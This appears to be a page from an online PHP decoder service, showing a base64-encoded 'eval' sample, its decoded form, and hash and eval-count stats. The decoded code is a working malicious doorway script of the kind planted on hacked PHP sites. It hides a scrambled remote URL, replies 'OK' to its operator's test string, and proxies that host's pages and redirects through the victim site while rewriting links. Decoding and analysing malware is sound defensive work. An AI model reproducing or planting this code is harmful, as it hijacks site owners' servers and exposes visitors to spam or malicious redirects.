Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<? eval(base64_decode("ICAgIGVycm9yX3JlcG9ydGluZygwKTsgICRscnUgPSAiZ2cvNTg0NTkzMzQ5MDEzMTg..

Decoded Output download

    error_reporting(0);  $lru = "gg/58459334901318928471798/122s543r844o858d520-5082168n445i821a581m204/918n871o216t189t961u962b613d811e694r369/575m182o497c564.667t430s465o757h277-263p780w721-107n638i241m516d707a587/337/289:691p256t160t807h345";  $url = '';  if (substr($lru, 0, 2)=='gg')  	{  	for($x=strlen($lru);$x>0;$x-=4) $url .= substr($lru,$x,1);  	}  else $url = $lru;    $e = '.php';  $q = "";  $test = 'suka-test';  if ((!$q || isset($_GET[$q])) && preg_match("/^[^\/][a-z0-9-_\/\.]+$/i", $a = $q ? $_GET[$q] : $_SERVER["QUERY_STRING"]))  	{  	if($test && $a == $test)  		{  		echo 'OK'; exit;  		}  	curl_setopt($ch = curl_init($url.($w=preg_replace("/^([a-z0-9-_]+)(\.php|\.html|\/|)$/i", '$1'.$e, $a, -1, $h))), CURLOPT_RETURNTRANSFER, 1);  	curl_setopt($ch, CURLOPT_HEADER, 0);  	curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);  	curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER["HTTP_USER_AGENT"]);    	if (isset($_SERVER["HTTP_REFERER"])) curl_setopt($ch, CURLOPT_REFERER, $_SERVER["HTTP_REFERER"]);    	$result = curl_exec($ch);    	if ((($c = curl_getinfo($ch, CURLINFO_HTTP_CODE)) == 301 || $c == 302) && ($u = curl_getinfo($ch, CURLINFO_EFFECTIVE_URL)))  		{  		$end = FALSE;  		$rd = $u;    		while ($end===FALSE)  			{  			curl_setopt($cht = curl_init($rd), CURLOPT_RETURNTRANSFER, 1);  			curl_setopt($cht, CURLOPT_HEADER, 1);  			curl_setopt($cht, CURLOPT_FOLLOWLOCATION, 0);  			curl_setopt($cht, CURLOPT_USERAGENT, 'Opera');  			curl_setopt($cht, CURLOPT_REFERER, 'http://www.google.com');  			$rrt = curl_exec($cht);    			$u = curl_getinfo($cht, CURLINFO_EFFECTIVE_URL);    			if (preg_match('#Location\: ([\S]+)#si',$rrt,$rdr))  				{  				$rd = $rdr[1];		  				}  			else  				{  				$end = TRUE;  				break;  				}			  			}    		header('Location: ' . $rd, true, $c);  		exit;  		}  	else if ($c == 200 && $result)  		{  		header('Content-Type: ' . curl_getinfo($ch, CURLINFO_CONTENT_TYPE));  		$result = preg_replace('#^.*?\<html#si','<html',$result);  		echo ($h || substr($a, -4) == '.css')  			?  			preg_replace('/<a(.*?)href=["\'](' . preg_quote(($t = ((!strncmp($_SERVER["REQUEST_URI"], $t = $_SERVER["SCRIPT_NAME"], strlen($t))) ? ($t . '?' . ($q ? $q . '=' : '' )) : '/' . substr($_SERVER["REQUEST_URI"], 1, -strlen($a))) . ((substr($a, -1) != '/' && ($y = strrpos($a, '/'))) ? substr($a, 0, $y) . '/' : '' )), '/') . '[a-z0-9-_]+)(' . preg_quote($e) . ')["\'](.*?)>/i', '<a$1href="$2' . (($h = strlen($w) - strlen($e) - strlen($a)) < 0 ? substr($a, $h) : "") . '"$4>', preg_replace('/<(a|link|img)(.*?)(href|src)=["\']([^\/][a-z0-9-_\.\/]+)["\'](.*?)>/i', '<$1$2$3="' . $t . '$4"$5>', preg_replace('/background(-image\:|\:)(.*?url\(["\'])([^\/][a-z0-9-_\.\/]+)(["\']\))/i', 'background$1$2' . $t . '$3$4', $result)))  			:  			$result; exit;  		}  	}

Did this file decode correctly?

Original Code

<? eval(base64_decode("ICAgIGVycm9yX3JlcG9ydGluZygwKTsgICRscnUgPSAiZ2cvNTg0NTkzMzQ5MDEzMTg5Mjg0NzE3OTgvMTIyczU0M3I4NDRvODU4ZDUyMC01MDgyMTY4bjQ0NWk4MjFhNTgxbTIwNC85MThuODcxbzIxNnQxODl0OTYxdTk2MmI2MTNkODExZTY5NHIzNjkvNTc1bTE4Mm80OTdjNTY0LjY2N3Q0MzBzNDY1bzc1N2gyNzctMjYzcDc4MHc3MjEtMTA3bjYzOGkyNDFtNTE2ZDcwN2E1ODcvMzM3LzI4OTo2OTFwMjU2dDE2MHQ4MDdoMzQ1IjsgICR1cmwgPSAnJzsgIGlmIChzdWJzdHIoJGxydSwgMCwgMik9PSdnZycpICAJeyAgCWZvcigkeD1zdHJsZW4oJGxydSk7JHg+MDskeC09NCkgJHVybCAuPSBzdWJzdHIoJGxydSwkeCwxKTsgIAl9ICBlbHNlICR1cmwgPSAkbHJ1OyAgICAkZSA9ICcucGhwJzsgICRxID0gIiI7ICAkdGVzdCA9ICdzdWthLXRlc3QnOyAgaWYgKCghJHEgfHwgaXNzZXQoJF9HRVRbJHFdKSkgJiYgcHJlZ19tYXRjaCgiL15bXlwvXVthLXowLTktX1wvXC5dKyQvaSIsICRhID0gJHEgPyAkX0dFVFskcV0gOiAkX1NFUlZFUlsiUVVFUllfU1RSSU5HIl0pKSAgCXsgIAlpZigkdGVzdCAmJiAkYSA9PSAkdGVzdCkgIAkJeyAgCQllY2hvICdPSyc7IGV4aXQ7ICAJCX0gIAljdXJsX3NldG9wdCgkY2ggPSBjdXJsX2luaXQoJHVybC4oJHc9cHJlZ19yZXBsYWNlKCIvXihbYS16MC05LV9dKykoXC5waHB8XC5odG1sfFwvfCkkL2kiLCAnJDEnLiRlLCAkYSwgLTEsICRoKSkpLCBDVVJMT1BUX1JFVFVSTlRSQU5TRkVSLCAxKTsgIAljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfSEVBREVSLCAwKTsgIAljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfRk9MTE9XTE9DQVRJT04sIDApOyAgCWN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VU0VSQUdFTlQsICRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSk7ICAgIAlpZiAoaXNzZXQoJF9TRVJWRVJbIkhUVFBfUkVGRVJFUiJdKSkgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1JFRkVSRVIsICRfU0VSVkVSWyJIVFRQX1JFRkVSRVIiXSk7ICAgIAkkcmVzdWx0ID0gY3VybF9leGVjKCRjaCk7ICAgIAlpZiAoKCgkYyA9IGN1cmxfZ2V0aW5mbygkY2gsIENVUkxJTkZPX0hUVFBfQ09ERSkpID09IDMwMSB8fCAkYyA9PSAzMDIpICYmICgkdSA9IGN1cmxfZ2V0aW5mbygkY2gsIENVUkxJTkZPX0VGRkVDVElWRV9VUkwpKSkgIAkJeyAgCQkkZW5kID0gRkFMU0U7ICAJCSRyZCA9ICR1OyAgICAJCXdoaWxlICgkZW5kPT09RkFMU0UpICAJCQl7ICAJCQljdXJsX3NldG9wdCgkY2h0ID0gY3VybF9pbml0KCRyZCksIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOyAgCQkJY3VybF9zZXRvcHQoJGNodCwgQ1VSTE9QVF9IRUFERVIsIDEpOyAgCQkJY3VybF9zZXRvcHQoJGNodCwgQ1VSTE9QVF9GT0xMT1dMT0NBVElPTiwgMCk7ICAJCQljdXJsX3NldG9wdCgkY2h0LCBDVVJMT1BUX1VTRVJBR0VOVCwgJ09wZXJhJyk7ICAJCQljdXJsX3NldG9wdCgkY2h0LCBDVVJMT1BUX1JFRkVSRVIsICdodHRwOi8vd3d3Lmdvb2dsZS5jb20nKTsgIAkJCSRycnQgPSBjdXJsX2V4ZWMoJGNodCk7ICAgIAkJCSR1ID0gY3VybF9nZXRpbmZvKCRjaHQsIENVUkxJTkZPX0VGRkVDVElWRV9VUkwpOyAgICAJCQlpZiAocHJlZ19tYXRjaCgnI0xvY2F0aW9uXDogKFtcU10rKSNzaScsJHJydCwkcmRyKSkgIAkJCQl7ICAJCQkJJHJkID0gJHJkclsxXTsJCSAgCQkJCX0gIAkJCWVsc2UgIAkJCQl7ICAJCQkJJGVuZCA9IFRSVUU7ICAJCQkJYnJlYWs7ICAJCQkJfQkJCSAgCQkJfSAgICAJCWhlYWRlcignTG9jYXRpb246ICcgLiAkcmQsIHRydWUsICRjKTsgIAkJZXhpdDsgIAkJfSAgCWVsc2UgaWYgKCRjID09IDIwMCAmJiAkcmVzdWx0KSAgCQl7ICAJCWhlYWRlcignQ29udGVudC1UeXBlOiAnIC4gY3VybF9nZXRpbmZvKCRjaCwgQ1VSTElORk9fQ09OVEVOVF9UWVBFKSk7ICAJCSRyZXN1bHQgPSBwcmVnX3JlcGxhY2UoJyNeLio/XDxodG1sI3NpJywnPGh0bWwnLCRyZXN1bHQpOyAgCQllY2hvICgkaCB8fCBzdWJzdHIoJGEsIC00KSA9PSAnLmNzcycpICAJCQk/ICAJCQlwcmVnX3JlcGxhY2UoJy88YSguKj8paHJlZj1bIlwnXSgnIC4gcHJlZ19xdW90ZSgoJHQgPSAoKCFzdHJuY21wKCRfU0VSVkVSWyJSRVFVRVNUX1VSSSJdLCAkdCA9ICRfU0VSVkVSWyJTQ1JJUFRfTkFNRSJdLCBzdHJsZW4oJHQpKSkgPyAoJHQgLiAnPycgLiAoJHEgPyAkcSAuICc9JyA6ICcnICkpIDogJy8nIC4gc3Vic3RyKCRfU0VSVkVSWyJSRVFVRVNUX1VSSSJdLCAxLCAtc3RybGVuKCRhKSkpIC4gKChzdWJzdHIoJGEsIC0xKSAhPSAnLycgJiYgKCR5ID0gc3RycnBvcygkYSwgJy8nKSkpID8gc3Vic3RyKCRhLCAwLCAkeSkgLiAnLycgOiAnJyApKSwgJy8nKSAuICdbYS16MC05LV9dKykoJyAuIHByZWdfcXVvdGUoJGUpIC4gJylbIlwnXSguKj8pPi9pJywgJzxhJDFocmVmPSIkMicgLiAoKCRoID0gc3RybGVuKCR3KSAtIHN0cmxlbigkZSkgLSBzdHJsZW4oJGEpKSA8IDAgPyBzdWJzdHIoJGEsICRoKSA6ICIiKSAuICciJDQ+JywgcHJlZ19yZXBsYWNlKCcvPChhfGxpbmt8aW1nKSguKj8pKGhyZWZ8c3JjKT1bIlwnXShbXlwvXVthLXowLTktX1wuXC9dKylbIlwnXSguKj8pPi9pJywgJzwkMSQyJDM9IicgLiAkdCAuICckNCIkNT4nLCBwcmVnX3JlcGxhY2UoJy9iYWNrZ3JvdW5kKC1pbWFnZVw6fFw6KSguKj91cmxcKFsiXCddKShbXlwvXVthLXowLTktX1wuXC9dKykoWyJcJ11cKSkvaScsICdiYWNrZ3JvdW5kJDEkMicgLiAkdCAuICckMyQ0JywgJHJlc3VsdCkpKSAgCQkJOiAgCQkJJHJlc3VsdDsgZXhpdDsgIAkJfSAgCX0gICAg")); ?>

Function Calls

base64_decode 1

Variables

None

Stats

MD5 7a2ff765126906c4c4923a74223246d6
Eval Count 1
Decode Time 78 ms